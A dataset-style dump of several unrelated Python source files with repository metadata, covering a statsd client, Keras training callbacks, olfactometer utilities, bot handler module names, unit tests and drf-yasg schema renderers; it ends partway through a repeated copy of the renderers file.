ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
x,u = test.solve_recursion()
us = []
for i in range(T):
us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
Ks
Ks
len(Ks)
x
| true
| true
|
790c5e3bc06dbbfc7cc0dd46b37ad7eaabe03919
| 282
|
py
|
Python
|
core/modules/handler/__init__.py
|
codacy-badger/nebula-2
|
81a257f6485da1899a2cb1df348a57332aa4b55c
|
[
"Apache-2.0"
] | null | null | null |
core/modules/handler/__init__.py
|
codacy-badger/nebula-2
|
81a257f6485da1899a2cb1df348a57332aa4b55c
|
[
"Apache-2.0"
] | null | null | null |
core/modules/handler/__init__.py
|
codacy-badger/nebula-2
|
81a257f6485da1899a2cb1df348a57332aa4b55c
|
[
"Apache-2.0"
] | null | null | null |
# Handler submodules exported by this package.
__all__ = ["main_handler",
           "welcome",
           "bad_words",
           "admin_command",
           "joke",
           "send_nudes",
           "custom_handler",
           "delete_buttons",
           "super_ban_handler"
           ]
# NOTE(review): this is a self-referential star import (the package imports
# itself); it relies on `from package import *` importing each submodule
# named in __all__ so that importing this package loads every handler --
# confirm this is intentional rather than a leftover.
from core.modules.handler import *
| 23.5
| 34
| 0.478723
|
__all__ = ["main_handler",
"welcome",
"bad_words",
"admin_command",
"joke",
"send_nudes",
"custom_handler",
"delete_buttons",
"super_ban_handler"
]
from core.modules.handler import *
| true
| true
|
790c5e409b73da6e783e80a037b3297ffd5fb732
| 2,047
|
py
|
Python
|
tests/tagtrain/test_remove.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
tests/tagtrain/test_remove.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | 7
|
2020-03-24T17:54:31.000Z
|
2021-09-21T12:34:34.000Z
|
tests/tagtrain/test_remove.py
|
c17r/TagTrain
|
5aa1ca36439cc5e81d0c691f905a4bb879b78399
|
[
"MIT"
] | null | null | null |
from unittest.mock import MagicMock, patch, call
from tagtrain import data
from . import fake
from tagtrain.tagtrain.tt_remove import Remove
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_group(remove_user_from_group):
    """Removing a member from a nonexistent group reports it and skips."""
    remove_user_from_group.side_effect = data.Group.DoesNotExist()
    app, reply, message, match = fake.create_all()
    Remove(app).run(reply, message, match)
    remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
    reply.append.assert_called_once_with('Group `GroupName` does not exist. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_member(remove_user_from_group):
    """Removing a non-member reports it and skips."""
    remove_user_from_group.side_effect = data.Member.DoesNotExist()
    app, reply, message, match = fake.create_all()
    Remove(app).run(reply, message, match)
    remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
    reply.append.assert_called_once_with('`MemberName` is not a Member of Group `GroupName`. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good(remove_user_from_group):
    """Successful removal confirms with the remaining member count."""
    remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=99)
    app, reply, message, match = fake.create_all()
    Remove(app).run(reply, message, match)
    remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
    reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 99 total Members.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good_no_members(remove_user_from_group):
    """Removal leaving an empty group still reports success (0 members)."""
    remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=0)
    app, reply, message, match = fake.create_all()
    Remove(app).run(reply, message, match)
    remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
    reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 0 total Members.')
| 38.622642
| 106
| 0.778701
|
from unittest.mock import MagicMock, patch, call
from tagtrain import data
from . import fake
from tagtrain.tagtrain.tt_remove import Remove
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_group(remove_user_from_group):
remove_user_from_group.side_effect = data.Group.DoesNotExist()
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('Group `GroupName` does not exist. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_unknown_member(remove_user_from_group):
remove_user_from_group.side_effect = data.Member.DoesNotExist()
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` is not a Member of Group `GroupName`. Skipping.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good(remove_user_from_group):
remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=99)
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 99 total Members.')
@patch('tagtrain.data.by_owner.remove_user_from_group')
def test_good_no_members(remove_user_from_group):
remove_user_from_group.return_value = fake.create_group(name='GroupName', member_count=0)
app, reply, message, match = fake.create_all()
Remove(app).run(reply, message, match)
remove_user_from_group.assert_called_once_with('AuthorName', 'GroupName', 'MemberName')
reply.append.assert_called_once_with('`MemberName` removed from Group `GroupName`, 0 total Members.')
| true
| true
|
790c5e8c77ccc8d864f5d6056fd6ac278203a09d
| 1,531
|
py
|
Python
|
statsd/client/udp.py
|
cclauss/pystatsd-1
|
1c90b9fdf322680e2625da659abc2aa5d79b5bff
|
[
"MIT"
] | null | null | null |
statsd/client/udp.py
|
cclauss/pystatsd-1
|
1c90b9fdf322680e2625da659abc2aa5d79b5bff
|
[
"MIT"
] | null | null | null |
statsd/client/udp.py
|
cclauss/pystatsd-1
|
1c90b9fdf322680e2625da659abc2aa5d79b5bff
|
[
"MIT"
] | 1
|
2020-11-01T04:03:38.000Z
|
2020-11-01T04:03:38.000Z
|
from __future__ import absolute_import, division, unicode_literals
import socket
from .base import StatsClientBase, PipelineBase
class Pipeline(PipelineBase):
    """Stat pipeline that packs queued stats into newline-joined UDP
    datagrams no larger than the client's configured maximum size."""
    def __init__(self, client):
        super(Pipeline, self).__init__(client)
        # Cache the datagram size limit from the owning client.
        self._maxudpsize = client._maxudpsize
    def _send(self):
        """Flush all queued stats, batching as many as fit per datagram."""
        data = self._stats.popleft()
        while self._stats:
            # Use popleft to preserve the order of the stats.
            stat = self._stats.popleft()
            if len(stat) + len(data) + 1 >= self._maxudpsize:
                # Current datagram is full; ship it and start a new one.
                self._client._after(data)
                data = stat
            else:
                data += '\n' + stat
        self._client._after(data)
class StatsClient(StatsClientBase):
    """A client for statsd."""
    def __init__(self, host='localhost', port=8125, prefix=None,
                 maxudpsize=512, ipv6=False):
        """Create a new client.

        The host is resolved once at construction time; the first
        getaddrinfo result for the requested family is used.
        """
        fam = socket.AF_INET6 if ipv6 else socket.AF_INET
        family, _, _, _, addr = socket.getaddrinfo(
            host, port, fam, socket.SOCK_DGRAM)[0]
        self._addr = addr
        self._sock = socket.socket(family, socket.SOCK_DGRAM)
        self._prefix = prefix
        self._maxudpsize = maxudpsize
    def _send(self, data):
        """Send data to statsd (best-effort: failures are swallowed so
        metrics can never crash the application)."""
        try:
            self._sock.sendto(data.encode('ascii'), self._addr)
        except (socket.error, RuntimeError):
            # No time for love, Dr. Jones!
            pass
    def pipeline(self):
        # New batching pipeline bound to this client.
        return Pipeline(self)
| 30.019608
| 66
| 0.594383
|
from __future__ import absolute_import, division, unicode_literals
import socket
from .base import StatsClientBase, PipelineBase
class Pipeline(PipelineBase):
def __init__(self, client):
super(Pipeline, self).__init__(client)
self._maxudpsize = client._maxudpsize
def _send(self):
data = self._stats.popleft()
while self._stats:
stat = self._stats.popleft()
if len(stat) + len(data) + 1 >= self._maxudpsize:
self._client._after(data)
data = stat
else:
data += '\n' + stat
self._client._after(data)
class StatsClient(StatsClientBase):
def __init__(self, host='localhost', port=8125, prefix=None,
maxudpsize=512, ipv6=False):
fam = socket.AF_INET6 if ipv6 else socket.AF_INET
family, _, _, _, addr = socket.getaddrinfo(
host, port, fam, socket.SOCK_DGRAM)[0]
self._addr = addr
self._sock = socket.socket(family, socket.SOCK_DGRAM)
self._prefix = prefix
self._maxudpsize = maxudpsize
def _send(self, data):
try:
self._sock.sendto(data.encode('ascii'), self._addr)
except (socket.error, RuntimeError):
pass
def pipeline(self):
return Pipeline(self)
| true
| true
|
790c5f4af793f98a8a8efe7949d616b14f82edda
| 2,828
|
py
|
Python
|
src/predictionAlgorithms/machineLearning/helpers/callbacks.py
|
aivaras-ciurlionis/meteo
|
434759d16f7cca505d280475611d1fef5176827b
|
[
"MIT"
] | null | null | null |
src/predictionAlgorithms/machineLearning/helpers/callbacks.py
|
aivaras-ciurlionis/meteo
|
434759d16f7cca505d280475611d1fef5176827b
|
[
"MIT"
] | 6
|
2020-05-23T11:30:48.000Z
|
2022-03-11T23:45:06.000Z
|
src/predictionAlgorithms/machineLearning/helpers/callbacks.py
|
aivaras-ciurlionis/meteo
|
434759d16f7cca505d280475611d1fef5176827b
|
[
"MIT"
] | null | null | null |
import keras
from sklearn.metrics import roc_auc_score
from src.predictionAlgorithms.machineLearning.helpers.validation import Validation
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import os
import glob
class Callbacks(keras.callbacks.Callback):
    """Keras training callback that runs periodic validation and saves a
    loss/accuracy plot to ``../output/`` after each epoch.

    Configure via the fluent ``set_*`` methods (each returns ``self`` so
    calls can be chained) before passing the instance to ``model.fit``.
    """
    validationSequences = []
    algorithm = None
    number = 1                 # running epoch counter used for validation gating
    validation_frequency = 1   # validate every N epochs
    size = 64
    step = 1
    base = 4
    def set_step(self, step):
        self.step = step
        return self
    def set_base(self, base):
        self.base = base
        # Bug fix: previously returned `base`, silently breaking the fluent
        # chaining convention that every other setter in this class follows.
        return self
    def set_size(self, size):
        self.size = size
        return self
    def set_validation_frequency(self, frequency):
        self.validation_frequency = frequency
        return self
    def set_validation_data(self, validation_data):
        self.validationSequences = validation_data
        return self
    def set_algorithm(self, algorithm):
        self.algorithm = algorithm
        return self
    def on_train_begin(self, logs={}):
        # Initialize the lists for holding the logs, losses and accuracies,
        # and clear stale epoch graphs from previous runs.
        self.losses = []
        self.acc = []
        self.val_losses = []
        self.val_acc = []
        self.logs = []
        epoch_graphs = glob.glob('../output/*')
        for f in epoch_graphs:
            os.remove(f)
    def on_train_end(self, logs={}):
        return
    def on_epoch_begin(self, epoch, logs={}):
        return
    def on_epoch_end(self, epoch, logs={}):
        # Only validate (and record/plot history) every
        # `validation_frequency` epochs.
        if self.number % self.validation_frequency != 0:
            self.number += 1
            return
        validation = Validation()
        validation.set_validation_data(self.validationSequences)\
            .set_dimensions(self.size)\
            .set_base(self.base)\
            .set_step(self.step)\
            .validate(self.algorithm)
        self.number += 1
        self.logs.append(logs)
        self.losses.append(logs.get('loss'))
        self.acc.append(logs.get('acc'))
        self.val_losses.append(logs.get('val_loss'))
        self.val_acc.append(logs.get('val_acc'))
        # Need at least two points before a line plot is meaningful.
        if len(self.losses) > 1:
            N = np.arange(0, len(self.losses))
            plt.figure()
            plt.plot(N, self.losses, label="train_loss")
            plt.plot(N, self.acc, label="train_acc")
            plt.plot(N, self.val_losses, label="val_loss")
            plt.plot(N, self.val_acc, label="val_acc")
            plt.title("Training Loss and Accuracy [Epoch {}]".format(epoch))
            plt.xlabel("Epoch #")
            plt.ylabel("Loss/Accuracy")
            plt.legend()
            plt.savefig('../output/Epoch-{}.png'.format(epoch))
            plt.close()
        return
    def on_batch_begin(self, batch, logs={}):
        return
    def on_batch_end(self, batch, logs={}):
        return
| 28
| 82
| 0.597595
|
import keras
from sklearn.metrics import roc_auc_score
from src.predictionAlgorithms.machineLearning.helpers.validation import Validation
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import os
import glob
class Callbacks(keras.callbacks.Callback):
    """Keras training callback that periodically runs an external Validation
    pass and writes cumulative loss/accuracy plots to ../output.

    All set_* methods return self so configuration can be chained fluently.
    """

    validationSequences = []
    algorithm = None
    number = 1                 # 1-based epoch counter used for frequency gating
    validation_frequency = 1   # run validation every N epochs
    size = 64
    step = 1
    base = 4

    def set_step(self, step):
        self.step = step
        return self

    def set_base(self, base):
        self.base = base
        # Bug fix: this previously returned `base`, which broke fluent
        # chaining; return self for consistency with the other setters.
        return self

    def set_size(self, size):
        self.size = size
        return self

    def set_validation_frequency(self, frequency):
        self.validation_frequency = frequency
        return self

    def set_validation_data(self, validation_data):
        self.validationSequences = validation_data
        return self

    def set_algorithm(self, algorithm):
        self.algorithm = algorithm
        return self

    def on_train_begin(self, logs={}):
        # Reset metric histories and clear stale graphs from earlier runs.
        self.losses = []
        self.acc = []
        self.val_losses = []
        self.val_acc = []
        self.logs = []
        epoch_graphs = glob.glob('../output/*')
        for f in epoch_graphs:
            os.remove(f)

    def on_train_end(self, logs={}):
        return

    def on_epoch_begin(self, epoch, logs={}):
        return

    def on_epoch_end(self, epoch, logs={}):
        # Only every `validation_frequency`-th epoch runs validation and
        # records/plots metrics.
        if self.number % self.validation_frequency != 0:
            self.number += 1
            return
        validation = Validation()
        validation.set_validation_data(self.validationSequences)\
            .set_dimensions(self.size)\
            .set_base(self.base)\
            .set_step(self.step)\
            .validate(self.algorithm)
        self.number += 1
        # Record this epoch's metrics; val_* entries may be None when fit()
        # was given no validation data.
        self.logs.append(logs)
        self.losses.append(logs.get('loss'))
        self.acc.append(logs.get('acc'))
        self.val_losses.append(logs.get('val_loss'))
        self.val_acc.append(logs.get('val_acc'))
        if len(self.losses) > 1:
            # Save a cumulative plot of all metrics recorded so far.
            N = np.arange(0, len(self.losses))
            plt.figure()
            plt.plot(N, self.losses, label="train_loss")
            plt.plot(N, self.acc, label="train_acc")
            plt.plot(N, self.val_losses, label="val_loss")
            plt.plot(N, self.val_acc, label="val_acc")
            plt.title("Training Loss and Accuracy [Epoch {}]".format(epoch))
            plt.xlabel("Epoch #")
            plt.ylabel("Loss/Accuracy")
            plt.legend()
            plt.savefig('../output/Epoch-{}.png'.format(epoch))
            plt.close()
        return

    def on_batch_begin(self, batch, logs={}):
        return

    def on_batch_end(self, batch, logs={}):
        return
| true
| true
|
790c5f9070d838cdcf8fa8c3eb3daa1d9f51e605
| 3,766
|
py
|
Python
|
olfactometry/utils.py
|
olfa-lab/PyBpodGUI
|
73895e493d982fd1d3abb5c8b521de116ef87c79
|
[
"MIT"
] | null | null | null |
olfactometry/utils.py
|
olfa-lab/PyBpodGUI
|
73895e493d982fd1d3abb5c8b521de116ef87c79
|
[
"MIT"
] | null | null | null |
olfactometry/utils.py
|
olfa-lab/PyBpodGUI
|
73895e493d982fd1d3abb5c8b521de116ef87c79
|
[
"MIT"
] | 1
|
2021-12-03T16:18:57.000Z
|
2021-12-03T16:18:57.000Z
|
import os
import json
import logging
import serial
from serial.tools import list_ports
import time
# Legacy default config filename, used when neither an explicit path nor the
# OLFA_CONFIG environment variable provides one (see get_olfa_config).
CONFIG_FILENAME_DEFAULT = 'olfa_config.json'
def get_olfa_config(config_filename=''):
    """
    Find and parse olfactometer configuration JSON.

    Resolution order: explicit argument, then the OLFA_CONFIG environment
    variable, then the legacy default filename.

    :param config_filename: string with path to configuration.
    :return: returns a tuple with (config_fn, config_dict)
    :rtype: tuple
    """
    if not config_filename:
        logging.info("No olfa config file specified, looking for default in OLFA_CONFIG os variable")
        config_filename = os.environ.get("OLFA_CONFIG")
    if not config_filename:
        # Environment variable was unset too; fall back to the legacy default.
        config_filename = CONFIG_FILENAME_DEFAULT
        logging.info("No OLFA_CONFIG os variable, trying with legacy default " + CONFIG_FILENAME_DEFAULT)
    if not os.path.exists(config_filename):
        raise Exception('No olfactometer configuration file found at {0}'.format(config_filename))
    with open(config_filename) as config_file:
        return config_filename, json.load(config_file)
def flatten_dictionary(dictionary, separator=':', flattened_dict=None, parent_string=''):
    """
    Flattens nested dictionary into a single dictionary:

        {'hello': {'world': 1,
                   'moon': 2}}
    becomes:
        {'hello:world': 1,
         'hello:moon': 2}

    Uses recursion to flatten as many layers as exist in your dictionary.
    :param dictionary: nested dictionary you wish to flatten.
    :param separator: string joining parent and child keys (default ':').
    :param flattened_dict: (used for recursion) current flattened dictionary to add to
    :param parent_string: (used for recursion) current key string to use as prefix for
    :return: flattened dictionary
    :type dictionary: dict
    :type separator: str
    :type flattened_dict: dict
    :type parent_string: str
    :rtype: dict
    """
    if flattened_dict is None:  # dicts are mutable, so we shouldn't use a dict as the default argument!!!
        flattened_dict = {}  # instead, redeclare an empty dictionary here.
    for k, v in dictionary.items():
        if parent_string:
            full_key = "{0}{1}{2}".format(parent_string, separator, k)
        else:
            full_key = k
        if isinstance(v, dict):  # use recursion to flatten and add nested dictionaries to the product.
            # Bug fix: pass `separator` through to the recursive call.
            # Previously nested levels always used the default ':' even when
            # the caller supplied a custom separator.
            _ = flatten_dictionary(
                v, separator=separator, flattened_dict=flattened_dict,
                parent_string=full_key)
        else:
            flattened_dict[full_key] = v
    return flattened_dict
def connect_serial(port, baudrate=115200, timeout=1, writeTimeout=1):
    """
    Return Serial object after making sure that the port is accessible and that the port is expressed as a string.

    :param port: str or int (ie "COM4" or 4 for Windows).
    :param baudrate: baudrate.
    :param timeout: read timeout in seconds, default 1 sec.
    :param writeTimeout: write timeout in seconds, default 1 sec.
    :return: serial port object.
    :rtype: serial.Serial
    """
    if isinstance(port, int):
        # Windows-style numeric port -> "COMn" string.
        port = "COM{0}".format(port)
    connected_ports = [info[0] for info in list_ports.comports()]
    if port in connected_ports:
        return serial.Serial(port, baudrate=baudrate, timeout=timeout, writeTimeout=writeTimeout)
    # Port not present: list what *is* connected to help debugging, then raise.
    print(("Serial not found on {0}.".format(port)))
    print('Listing current serial ports with devices:')
    for ser in list_ports.comports():
        print('\t{0}: {1}'.format(ser[0], ser[1]))
    time.sleep(.01)  # just to let the above lines print before the exemption is raised. cleans console output.
    raise serial.SerialException('Requested COM port: {0} is not listed as connected.'.format(port))
class OlfaException(Exception):
    """Base exception type for olfactometry-specific errors."""
    pass
| 36.921569
| 115
| 0.674456
|
import os
import json
import logging
import serial
from serial.tools import list_ports
import time
# Legacy default config filename, used when neither an explicit path nor the
# OLFA_CONFIG environment variable provides one (see get_olfa_config).
CONFIG_FILENAME_DEFAULT = 'olfa_config.json'
def get_olfa_config(config_filename=''):
    """
    Find and parse olfactometer configuration JSON.

    Resolution order: explicit argument, then the OLFA_CONFIG environment
    variable, then the legacy default filename.

    :param config_filename: string with path to configuration.
    :return: returns a tuple with (config_fn, config_dict)
    :rtype: tuple
    """
    if not config_filename:
        logging.info("No olfa config file specified, looking for default in OLFA_CONFIG os variable")
        config_filename = os.environ.get("OLFA_CONFIG")
        # If the environment variable was unset too, fall back to the legacy default.
        if not config_filename:
            config_filename = CONFIG_FILENAME_DEFAULT
            logging.info("No OLFA_CONFIG os variable, trying with legacy default " + CONFIG_FILENAME_DEFAULT)
    if os.path.exists(config_filename):
        with open(config_filename) as f:
            config = json.load(f)
    else:
        raise Exception('No olfactometer configuration file found at {0}'.format(config_filename))
    return config_filename, config
def flatten_dictionary(dictionary, separator=':', flattened_dict=None, parent_string=''):
    """Flattens a nested dictionary into a single level, joining nested keys
    with `separator` (e.g. {'a': {'b': 1}} -> {'a:b': 1}).

    :param dictionary: nested dictionary you wish to flatten.
    :param separator: string joining parent and child keys (default ':').
    :param flattened_dict: (used for recursion) current flattened dictionary to add to.
    :param parent_string: (used for recursion) current key prefix.
    :rtype: dict
    """
    if flattened_dict is None:
        flattened_dict = {}  # instead, redeclare an empty dictionary here.
    for k, v in dictionary.items():
        if parent_string:
            full_key = "{0}{1}{2}".format(parent_string, separator, k)
        else:
            full_key = k
        if isinstance(v, dict):  # use recursion to flatten and add nested dictionaries to the product.
            # Bug fix: pass `separator` through; previously nested levels
            # always used the default ':' even with a custom separator.
            _ = flatten_dictionary(
                v, separator=separator, flattened_dict=flattened_dict,
                parent_string=full_key)
        else:
            flattened_dict[full_key] = v
    return flattened_dict
def connect_serial(port, baudrate=115200, timeout=1, writeTimeout=1):
    """
    Return Serial object after making sure that the port is accessible and that the port is expressed as a string.

    :param port: str or int (ie "COM4" or 4 for Windows).
    :param baudrate: baudrate.
    :param timeout: read timeout in seconds, default 1 sec.
    :param writeTimeout: write timeout in seconds, default 1 sec.
    :return: serial port object.
    :rtype: serial.Serial
    """
    if isinstance(port, int):
        # Windows-style numeric port -> "COMn" string.
        port = "COM{0}".format(port)
    names_list = list()
    for i in list_ports.comports():
        names_list.append(i[0])
    if port not in names_list:
        # Port not present: list connected ports to help debugging, then raise.
        print(("Serial not found on {0}.".format(port)))
        print('Listing current serial ports with devices:')
        for ser in list_ports.comports():
            ser_str = '\t{0}: {1}'.format(ser[0], ser[1])
            print(ser_str)
        time.sleep(.01)  # just to let the above lines print before the exemption is raised. cleans console output.
        raise serial.SerialException('Requested COM port: {0} is not listed as connected.'.format(port))
    else:
        return serial.Serial(port, baudrate=baudrate, timeout=timeout, writeTimeout=writeTimeout)
class OlfaException(Exception):
    """Base exception type for olfactometry-specific errors."""
    pass
| true
| true
|
790c5fcb996d72b9571af6b7d6b1843518659273
| 7,274
|
py
|
Python
|
src/drf_yasg/renderers.py
|
yihuang/drf-yasg
|
e860ce315f85b93731b5d7a7dfcc91149d2a1948
|
[
"BSD-3-Clause"
] | null | null | null |
src/drf_yasg/renderers.py
|
yihuang/drf-yasg
|
e860ce315f85b93731b5d7a7dfcc91149d2a1948
|
[
"BSD-3-Clause"
] | null | null | null |
src/drf_yasg/renderers.py
|
yihuang/drf-yasg
|
e860ce315f85b93731b5d7a7dfcc91149d2a1948
|
[
"BSD-3-Clause"
] | null | null | null |
import six
from django.shortcuts import render, resolve_url
from django.utils.functional import Promise
from rest_framework.renderers import BaseRenderer, JSONRenderer, TemplateHTMLRenderer
from rest_framework.utils import json
from .app_settings import redoc_settings, swagger_settings
from .codecs import VALIDATORS, OpenAPICodecJson, OpenAPICodecYaml
from .openapi import Swagger
from .utils import filter_none
class _SpecRenderer(BaseRenderer):
    """Base class for text renderers. Handles encoding and validation."""
    charset = 'utf-8'
    validators = []
    codec_class = None

    @classmethod
    def with_validators(cls, validators):
        """Return a dynamically-created subclass whose ``validators`` is set to the given list."""
        assert all(vld in VALIDATORS for vld in validators), "allowed validators are " + ", ".join(VALIDATORS)
        return type(cls.__name__, (cls,), {'validators': validators})

    def render(self, data, media_type=None, renderer_context=None):
        """Encode ``data`` via ``codec_class``; fall back to plain JSON for non-Swagger payloads."""
        assert self.codec_class, "must override codec_class"
        codec = self.codec_class(self.validators)
        if not isinstance(data, Swagger):  # pragma: no cover
            # if `swagger` is not a ``Swagger`` object, it means we somehow got a non-success ``Response``
            # in that case, it's probably better to let the default ``JSONRenderer`` render it
            # see https://github.com/axnsan12/drf-yasg/issues/58
            return JSONRenderer().render(data, media_type, renderer_context)
        return codec.encode(data)
class OpenAPIRenderer(_SpecRenderer):
    """Renders the schema as a JSON document with the ``application/openapi+json`` specific mime type."""
    media_type = 'application/openapi+json'
    format = 'openapi'
    # JSON codec; only the mime type differs from SwaggerJSONRenderer.
    codec_class = OpenAPICodecJson
class SwaggerJSONRenderer(_SpecRenderer):
    """Renders the schema as a JSON document with the generic ``application/json`` mime type."""
    media_type = 'application/json'
    format = '.json'
    codec_class = OpenAPICodecJson
class SwaggerYAMLRenderer(_SpecRenderer):
    """Renders the schema as a YAML document."""
    media_type = 'application/yaml'
    format = '.yaml'
    codec_class = OpenAPICodecYaml
class _UIRenderer(BaseRenderer):
    """Base class for web UI renderers. Handles loading and passing settings to the appropriate template."""
    media_type = 'text/html'
    charset = 'utf-8'
    template = ''

    def render(self, swagger, accepted_media_type=None, renderer_context=None):
        """Render the spec into the HTML ``template``; fall back for non-Swagger payloads."""
        if not isinstance(swagger, Swagger):  # pragma: no cover
            # if `swagger` is not a ``Swagger`` object, it means we somehow got a non-success ``Response``
            # in that case, it's probably better to let the default ``TemplateHTMLRenderer`` render it
            # see https://github.com/axnsan12/drf-yasg/issues/58
            return TemplateHTMLRenderer().render(swagger, accepted_media_type, renderer_context)
        self.set_context(renderer_context, swagger)
        return render(renderer_context['request'], self.template, renderer_context)

    def set_context(self, renderer_context, swagger=None):
        """Populate the template context with spec metadata, OAuth2 config and auth URLs."""
        renderer_context['title'] = swagger.info.title or '' if swagger else ''
        renderer_context['version'] = swagger.info.version or '' if swagger else ''
        renderer_context['oauth2_config'] = json.dumps(self.get_oauth2_config())
        renderer_context['USE_SESSION_AUTH'] = swagger_settings.USE_SESSION_AUTH
        renderer_context.update(self.get_auth_urls())

    def resolve_url(self, to):
        """Resolve a URL setting which may be None, a (lazy) string/view name,
        or a (name, kwargs) / (name, args, kwargs) tuple."""
        if isinstance(to, Promise):
            # force lazy strings (e.g. reverse_lazy results) before dispatching on type
            to = str(to)

        if to is None:
            return None

        args, kwargs = None, None
        if not isinstance(to, six.string_types):
            if len(to) > 2:
                to, args, kwargs = to
            elif len(to) == 2:
                to, kwargs = to
        args = args or ()
        kwargs = kwargs or {}
        return resolve_url(to, *args, **kwargs)

    def get_auth_urls(self):
        """Return LOGIN_URL/LOGOUT_URL context entries, omitting unset (None) ones."""
        urls = {
            'LOGIN_URL': self.resolve_url(swagger_settings.LOGIN_URL),
            'LOGOUT_URL': self.resolve_url(swagger_settings.LOGOUT_URL),
        }
        return filter_none(urls)

    def get_oauth2_config(self):
        """Return the OAUTH2_CONFIG setting after checking it is a dict."""
        data = swagger_settings.OAUTH2_CONFIG
        assert isinstance(data, dict), "OAUTH2_CONFIG must be a dict"
        return data
class SwaggerUIRenderer(_UIRenderer):
    """Renders a swagger-ui web interface for schema browsing."""
    template = 'drf-yasg/swagger-ui.html'
    format = 'swagger'

    def set_context(self, renderer_context, swagger=None):
        """Add the serialized swagger-ui settings on top of the base UI context."""
        super(SwaggerUIRenderer, self).set_context(renderer_context, swagger)
        renderer_context['swagger_settings'] = json.dumps(self.get_swagger_ui_settings())

    def get_swagger_ui_settings(self):
        """Map SWAGGER_SETTINGS values onto swagger-ui configuration keys, dropping unset ones."""
        data = {
            'url': self.resolve_url(swagger_settings.SPEC_URL),
            'operationsSorter': swagger_settings.OPERATIONS_SORTER,
            'tagsSorter': swagger_settings.TAGS_SORTER,
            'docExpansion': swagger_settings.DOC_EXPANSION,
            'deepLinking': swagger_settings.DEEP_LINKING,
            'showExtensions': swagger_settings.SHOW_EXTENSIONS,
            'defaultModelRendering': swagger_settings.DEFAULT_MODEL_RENDERING,
            'defaultModelExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
            'defaultModelsExpandDepth': swagger_settings.DEFAULT_MODEL_DEPTH,
            'showCommonExtensions': swagger_settings.SHOW_COMMON_EXTENSIONS,
            'oauth2RedirectUrl': swagger_settings.OAUTH2_REDIRECT_URL,
            'supportedSubmitMethods': swagger_settings.SUPPORTED_SUBMIT_METHODS,
            'displayOperationId': swagger_settings.DISPLAY_OPERATION_ID,
            'persistAuth': swagger_settings.PERSIST_AUTH,
            'refetchWithAuth': swagger_settings.REFETCH_SCHEMA_WITH_AUTH,
            'refetchOnLogout': swagger_settings.REFETCH_SCHEMA_ON_LOGOUT,
            'fetchSchemaWithQuery': swagger_settings.FETCH_SCHEMA_WITH_QUERY,
        }
        data = filter_none(data)
        # NOTE(review): an empty-string VALIDATOR_URL suppresses the key
        # entirely, while None is forwarded as-is after the filter — confirm
        # this matches the intended swagger-ui "disable validator" semantics.
        if swagger_settings.VALIDATOR_URL != '':
            data['validatorUrl'] = self.resolve_url(swagger_settings.VALIDATOR_URL)
        return data
class ReDocRenderer(_UIRenderer):
    """Renders a ReDoc web interface for schema browsing."""
    template = 'drf-yasg/redoc.html'
    format = 'redoc'

    def set_context(self, renderer_context, swagger=None):
        """Add the serialized ReDoc settings on top of the base UI context."""
        super(ReDocRenderer, self).set_context(renderer_context, swagger)
        renderer_context['redoc_settings'] = json.dumps(self.get_redoc_settings())

    def get_redoc_settings(self):
        """Map REDOC_SETTINGS values onto ReDoc configuration keys, dropping unset ones."""
        data = {
            'url': self.resolve_url(redoc_settings.SPEC_URL),
            'lazyRendering': redoc_settings.LAZY_RENDERING,
            'hideHostname': redoc_settings.HIDE_HOSTNAME,
            'expandResponses': redoc_settings.EXPAND_RESPONSES,
            'pathInMiddlePanel': redoc_settings.PATH_IN_MIDDLE,
            'nativeScrollbars': redoc_settings.NATIVE_SCROLLBARS,
            'requiredPropsFirst': redoc_settings.REQUIRED_PROPS_FIRST,
            'fetchSchemaWithQuery': redoc_settings.FETCH_SCHEMA_WITH_QUERY,
        }
        return filter_none(data)
class ReDocOldRenderer(ReDocRenderer):
    """Renders a ReDoc 1.x.x web interface for schema browsing."""
    # Same settings as ReDocRenderer; only the template (ReDoc 1.x bundle) differs.
    template = 'drf-yasg/redoc-old.html'
| 41.096045
| 110
| 0.690267
|
import six
from django.shortcuts import render, resolve_url
from django.utils.functional import Promise
